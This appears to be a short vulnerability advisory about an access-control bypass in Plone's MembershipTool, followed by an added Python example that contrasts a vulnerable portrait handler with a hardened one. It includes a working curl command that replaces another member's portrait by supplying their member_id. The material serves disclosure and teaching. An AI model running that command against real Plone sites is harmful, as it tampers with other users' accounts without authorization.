
Plone MembershipTool Access Control Bypass Vulnerability

Attackers may use standard web client applications to exploit this issue.

The following 'curl' command demonstrates replacing a portrait image with attacker-specified content:

curl -F portrait=<path_to_file> --form-string member_id=[username] http://www.example.com/portal_membership/changeMemberPortrait
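The request above works because the endpoint takes the target account from the client-supplied member_id form field instead of from the authenticated session. The following Python illustration is added here and is not Plone's code: it models that pattern with a hypothetical MembershipTool class, showing the vulnerable handler next to a hardened one that lets a caller change only their own portrait unless they hold an assumed 'Manager' role.

```python
# Added illustration of the access-control flaw class behind changeMemberPortrait.
# MembershipTool, Member and the 'Manager' role are constructed stand-ins, not Plone API.
from dataclasses import dataclass, field
from typing import Optional


class Unauthorized(Exception):
    """Raised when the caller may not change the requested member's portrait."""


@dataclass
class Member:
    id: str
    roles: set = field(default_factory=set)


@dataclass
class MembershipTool:
    """Hypothetical stand-in for portal_membership: stores portraits keyed by member id."""
    portraits: dict = field(default_factory=dict)

    def change_portrait_vulnerable(self, caller: Member, portrait: bytes,
                                   member_id: Optional[str] = None) -> str:
        # Vulnerable pattern: the form field decides whose portrait is replaced,
        # so any authenticated member can overwrite any other member's portrait.
        target = member_id or caller.id
        self.portraits[target] = portrait
        return target

    def change_portrait_hardened(self, caller: Member, portrait: bytes,
                                 member_id: Optional[str] = None) -> str:
        # Hardened pattern: the target defaults to the authenticated caller, and a
        # member_id naming someone else is honoured only for a 'Manager' (assumed role).
        target = member_id or caller.id
        if target != caller.id and "Manager" not in caller.roles:
            raise Unauthorized(f"{caller.id} may not change the portrait of {target}")
        self.portraits[target] = portrait
        return target


def demo() -> dict:
    """Run both handlers against constructed members and report the outcomes."""
    alice = Member("alice")
    admin = Member("admin", roles={"Manager"})
    tool = MembershipTool(portraits={"bob": b"bob-original"})
    results = {}

    # Vulnerable: alice supplies member_id=bob and silently replaces bob's portrait.
    tool.change_portrait_vulnerable(alice, b"attacker-content", member_id="bob")
    results["vulnerable_bob_portrait"] = tool.portraits["bob"]

    # Hardened: the same request from alice is refused ...
    tool.portraits["bob"] = b"bob-original"
    try:
        tool.change_portrait_hardened(alice, b"attacker-content", member_id="bob")
        results["hardened_alice_refused"] = False
    except Unauthorized:
        results["hardened_alice_refused"] = True
    results["hardened_bob_portrait"] = tool.portraits["bob"]

    # ... alice may still change her own portrait, and a Manager may change bob's.
    results["alice_self_target"] = tool.change_portrait_hardened(alice, b"alice-new")
    results["manager_target"] = tool.change_portrait_hardened(admin, b"manager-set", member_id="bob")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The fix is deliberately simple: authorization is decided from server-side session state (caller identity and roles), and the request parameter only selects a target that the caller is already allowed to touch.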

Copyright 2009, SecurityFocus